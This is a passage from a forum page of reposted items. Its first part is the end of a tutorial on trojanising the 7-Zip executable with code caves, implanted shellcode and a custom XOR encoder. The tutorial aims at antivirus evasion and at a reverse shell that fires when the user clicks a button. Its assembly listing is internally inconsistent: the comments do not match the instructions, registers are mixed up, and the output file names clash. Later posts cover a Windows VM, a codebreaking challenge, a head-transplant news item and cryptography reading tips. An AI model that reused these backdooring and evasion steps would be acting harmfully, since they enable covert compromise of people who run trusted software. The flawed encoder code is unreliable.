7zip file in Ollydbg and trigger the hijacking process by clicking on the domain button. Hijacking execution flow to CC2 Now that we are in CC2, before writing our XOR encoder here, we will firstly jump to starting address of CC1 and implant our shellcode so that we get the accurate addresses that we have to use in XOR encoder. Note that the first step of hijacking to CC2 can also be performed at the end as well, as it won’t impact the overall execution flow illustrated in flowchart above. We jump to CC1 , implant, modify shellcode and restore the execution flow to 0044A8E5 from where we hijacked to CC2 to make sure smooth execution of 7zip program functionality after shellcode. Note that implanting, modifying shellcode and restoring execution flow is already explained in previous sections. Bottom of shellocode at CC1 Above screenshot shows the bottom of shellocode at CC1, note down the address 0047799B, this is where the shellcode ends, next instructions are for restoring the execution flow back. So we have to encode from starting of the shellcode at address 00477859 till 0047799B. We move to 00477857 the starting address of CC2, we write XOR encoder, following are the opcodes for XOR encoder implementation. PUSH ECX, 00477857 // Push the starting address of shellcode to ECX. XOR BYTE PTR DS:[EAX],0B // Exclusive OR the contents of ECX with key 0B INC ECX // Increase ECX to move to next addresses CMP ECX,0047799B // Compare ECX with the ending address of shellcode JLE SHORT 00479733 // If they are not equal, take a short jump back to address of XOR operation JMP 7zFM2.00477857 // if they are equal jump to the start of shellcode As we are encoding the opcodes in CC1, we have to make sure the header section in which the CC1 resides is writeable otherwise Ollydbg will show access violation error. Refer back to codecaves section to know how to make it writable and executable. We add a breakpoint at JMP 7zFM2.00477857 after the encoding is performed and we are about to jump back to encoded shellcode. If we go back to CC1 we will see that out shellcode is encoded now. Custom encode shellcode in memory All is left to save the modifications of both the shellcode at CC1 and the encoder at CC2 to a file we named it as 7zFMowned.exe. Lets see if its working as intended. Spawning shell We setup a listener on port 8080 on our Kali box, run 7zFMbackdoored.exe in windows and click on domain button . 7zip website pops up in the browser and if we go back to our kali box. We got a shell How are we doing detection wise? Fully undetectable PE file using Dual code caves, custom encoder and trigger upon user interaction Conclusion Great! we have achieved fully undetectable backdoor PE file that remains functional with the same size. Sursa: https://haiderm.com/fully-undetectable-backdooring-pe-files/
-
- 5
-
Windows 10 Enterprise (Evaluation - Build 201710) 20 GB download This VM will expire on 1/15/18. We currently package our virtual machines for four different virtualization software options: VMWare, Hyper-V, VirtualBox, and Parallels. This evaluation virtual machine includes: Windows 10 Fall Creators Update Enterprise Evaluation Visual Studio 2017 (Build 15.4) with the UWP, desktop C++, and Azure workflows enabled Windows developer SDK and tools (Build 16299.15, installed as part of VS UWP workflow) Windows UWP samples (Latest) Windows Subsystem for Linux enabled Developer mode, Bash on Ubuntu on Windows, and containers enabled The Microsoft Software License Terms for the Windows 10 VMs supersede any conflicting Windows license terms included in the VMs. Link: https://developer.microsoft.com/en-us/windows/downloads/virtual-machines
-
- 1
-
Welcome to the 2017 Codebreaker Challenge! To get started, register for an account using your .edu email address. Then, visit the Challenge page to receive your instructions for starting on the first task in the challenge. For information on reverse engineering and for some tips on how to get started, check out the Resources page. Good luck! Link: https://codebreaker.ltsnet.net/home
-
- 2
-
The world's first human head transplant has been carried out on a corpse in China, according to Italian professor Sergio Canavero. During an 18-hour operation, experts demonstrated that it is possible to successfully reconnect the spine, nerves and blood vessels of a severed head. Professor Canavero, director of the Turin Advanced Neuromodulation Group, made the announcement at a press conference in Vienna this morning. The procedure was carried out by a team led by Dr Xiaoping Ren, who last year grafted a head onto the body of a monkey. A full report of the Harbin Medical University team's procedure and a timeframe for the live transplant are expected within the next few days. Speaking at the press conference, Professor Canavero said: 'For too long nature has dictated her rules to us. 'We're born, we grow, we age and we die. For millions of years humans has evolved and 110 billion humans have died in the process. 'That's genocide on a mass scale. 'We have entered an age where we will take our destiny back in our hands. 'It will change everything. It will change you at every level. 'The first human head transplant, in the human mode, has been realised. 'The surgery lasted 18 hours. The paper will be released in a few days.' 'Everyone said it was impossible, but the surgery was successful.' Professor Canavero added that the team's next step is to perform a full head swap between brain dead organ donors. Sursa & articol complet: http://www.dailymail.co.uk/sciencetech/article-5092769/World-s-human-head-transplant-carried-out.html
-
poti incepe cu: Istoria codurilor secrete - Laurent Joffrin (foarte "readable", la sfarsitul fiecarui capitol vei avea de "spart" cate ceva) poti incerca si The Codebreakers - Kahn David (history of cryptography from ancient Egypt to the time of its writing) https://www.coursera.org/learn/crypto (ai sa intelegi de ce ti l-am recomandat) https://cryptopals.com/ ca sa nu mai ai timp liber